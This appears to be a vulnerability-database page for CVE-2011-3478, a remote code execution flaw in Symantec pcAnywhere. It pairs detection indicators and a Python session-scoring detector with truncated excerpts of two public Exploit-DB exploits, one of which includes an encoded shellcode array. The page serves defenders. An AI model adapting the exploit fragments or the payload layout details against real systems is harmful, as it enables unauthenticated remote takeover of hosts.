CVE-2011-3478
Published: 2012-01-25
Priority: P2 (75) · Severity: critical · CVSS 2.0 base score: 10 · Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 39.31% (98.4th percentile)
The host-services component in Symantec pcAnywhere 12.5.x through 12.5.3, and IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x), does not properly filter login and authentication data, which allows remote attackers to execute arbitrary code via a crafted session on TCP port 5631.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| symantec | pcanywhere | — | — |
| symantec | pcanywhere | — | — |
| symantec | pcanywhere | — | — |
| symantec | pcanywhere | — | — |
Detection & IOCs (extracted from sources)
- Monitor for unauthenticated TCP connections to port 5631 (pcAnywhere) followed by the 4-byte init sequence \x00\x00\x00\x00 and the handshake \x0d\x06\xfe, which is the exploit's session setup pattern.
- Alert on oversized login/password fields sent to TCP port 5631; the exploit sends a username of 100–175 bytes followed by a password buffer of ~3500 bytes, far exceeding normal authentication data sizes.
- The exploit targets awhost32.exe modules with no ASLR, SafeSEH, or NXCompat protections; detection of shellcode execution in this process context (NT AUTHORITY\SYSTEM) should be prioritised.
- The only bad character for this exploit is \x00; any large binary payload on TCP 5631 lacking null bytes in the password field should be treated as suspicious.
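The four indicators above can be combined into a single per-session scoring heuristic. The following is an added example written for this page, not code from the CVE record or from Symantec: it assumes a capture pipeline that hands over the client-to-server payloads of one TCP connection as a list of byte strings, and the size thresholds (`MAX_SANE_AUTH_BYTES`, `MIN_SUSPECT_BINARY_RUN`) and the non-printable ratio are assumed cut-offs chosen from the byte counts quoted in the IOC list, not values taken from the protocol specification. The two sample sessions at the bottom are constructed.

```python
"""Heuristic scoring of pcAnywhere (TCP 5631) client sessions for the
CVE-2011-3478 exploitation pattern described in the IOC list.

Added example; record layout and thresholds are assumptions."""
from dataclasses import dataclass
from typing import List

PCANYWHERE_PORT = 5631
INIT_SEQUENCE = b"\x00\x00\x00\x00"   # 4-byte init sequence from the IOC list
HANDSHAKE = b"\x0d\x06\xfe"           # handshake bytes from the IOC list
MAX_SANE_AUTH_BYTES = 512             # assumption: normal login+password stay well below this
MIN_SUSPECT_BINARY_RUN = 1024         # assumption: exploit password buffer is ~3500 null-free bytes
MIN_NON_PRINTABLE_RATIO = 0.3         # assumption: shellcode is mostly non-printable


@dataclass
class ClientSession:
    """Client-to-server side of one TCP connection (assumed capture format)."""
    dst_port: int
    authenticated: bool          # whether the server accepted a login (from app logs)
    payloads: List[bytes]        # client payloads in wire order


def looks_like_exploit_setup(stream: bytes) -> bool:
    """True if the init sequence is followed (anywhere later) by the handshake."""
    idx = stream.find(INIT_SEQUENCE)
    if idx == -1:
        return False
    return HANDSHAKE in stream[idx + len(INIT_SEQUENCE):]


def largest_null_free_run(stream: bytes) -> int:
    """Length of the longest contiguous run of bytes with no 0x00 in it."""
    return max((len(chunk) for chunk in stream.split(b"\x00")), default=0)


def non_printable_ratio(stream: bytes) -> float:
    """Fraction of bytes outside the printable ASCII range 0x20..0x7e."""
    if not stream:
        return 0.0
    non_printable = sum(1 for b in stream if b < 0x20 or b > 0x7E)
    return non_printable / len(stream)


def assess(session: ClientSession) -> List[str]:
    """Return the list of IOC names matched by this session (empty if none)."""
    findings: List[str] = []
    if session.dst_port != PCANYWHERE_PORT:
        return findings
    stream = b"".join(session.payloads)

    # IOC 1: unauthenticated connection showing the exploit's session setup pattern.
    # Legitimate clients may send the same bytes, so this is a weak signal on its own.
    if not session.authenticated and looks_like_exploit_setup(stream):
        findings.append("session-setup-pattern")

    # IOC 2: far more authentication data than any real login/password pair needs.
    if len(stream) > MAX_SANE_AUTH_BYTES:
        findings.append(f"oversized-auth-data:{len(stream)}")

    # IOC 4: a large null-free binary blob, consistent with a shellcode payload
    # that had to avoid the single bad character \x00.
    run = largest_null_free_run(stream)
    if run >= MIN_SUSPECT_BINARY_RUN and non_printable_ratio(stream) >= MIN_NON_PRINTABLE_RATIO:
        findings.append(f"large-null-free-binary-run:{run}")
    return findings


def verdict(findings: List[str]) -> str:
    """Collapse findings into a triage level: the size-based IOCs are strong,
    the setup pattern alone is only worth a low-priority note."""
    if any(f.startswith(("oversized-auth-data", "large-null-free-binary-run")) for f in findings):
        return "high"
    if findings:
        return "low"
    return "none"


# Constructed sample sessions (not captured traffic).
BENIGN = ClientSession(
    dst_port=PCANYWHERE_PORT,
    authenticated=False,
    payloads=[INIT_SEQUENCE + HANDSHAKE, b"alice\r\nhunter2\r\n"],
)
# Mimics the IOC description: 150-byte username, ~3500-byte null-free binary password.
_FAKE_PASSWORD_BLOB = (bytes(range(1, 256)) * 14)[:3500]
SUSPICIOUS = ClientSession(
    dst_port=PCANYWHERE_PORT,
    authenticated=False,
    payloads=[INIT_SEQUENCE + HANDSHAKE, b"A" * 150, _FAKE_PASSWORD_BLOB],
)

if __name__ == "__main__":
    for name, sess in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        found = assess(sess)
        print(f"{name}: verdict={verdict(found)} findings={found}")
```

Feeding every new connection to port 5631 through `assess` and paging only on a `high` verdict keeps the weak session-setup indicator from generating noise while still catching the oversized, null-free credential buffers that distinguish the exploit from a normal login.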
No detection rules found.
Exploit-DB · 2015-11-02
CVE-2011-3478 Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution
---
```python
#!/usr/bin/python
################################################################
# Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE
# Date: 2015-10-31
# Exploit Author: Tomislav Paskalev
# Vendor Homepage: https://www.symantec.com/
# Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe
# Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# Vulnerable Software:
# Symantec pcAnywhere 12.5.x through 12.5.3
# Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)
# Tested on:
# Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# --------------------------------------------
# Microsoft Windows Vista Ultimate SP1 x86 EN
# Microsoft Windo
```
Exploit-DB · 2012-06-27 · CVSS 10.0
CVE-2011-3478 [CRITICAL] Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow
---
```python
#!/usr/bin/python
# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478
# EDB Note: Needs adjustment but there is a crash
# Code :
import socket
import time
import struct
import string
import sys
shell = (
"\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9"
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8"
"\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d"
"\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9"
"\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48"
"\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf
```
No writeups or analysis indexed.
References
- http://osvdb.org/show/osvdb/78532
- http://secunia.com/advisories/48092
- http://www.securityfocus.com/bid/51592
- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120124_00
- http://www.zerodayinitiative.com/advisories/ZDI-12-018/
- https://www.exploit-db.com/exploits/38599/